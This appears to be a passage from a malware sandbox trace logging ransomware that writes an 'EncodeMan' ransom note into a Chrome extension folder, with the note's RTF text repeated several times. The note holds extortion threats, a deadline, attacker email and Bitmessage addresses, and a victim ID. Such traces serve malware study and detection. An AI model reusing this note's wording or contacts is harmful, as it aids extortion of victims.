ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.752] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.753] CloseHandle (hObject=0x2cc) returned 1 [0283.753] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0283.753] GetLastError () returned 0x2 [0283.753] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.754] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 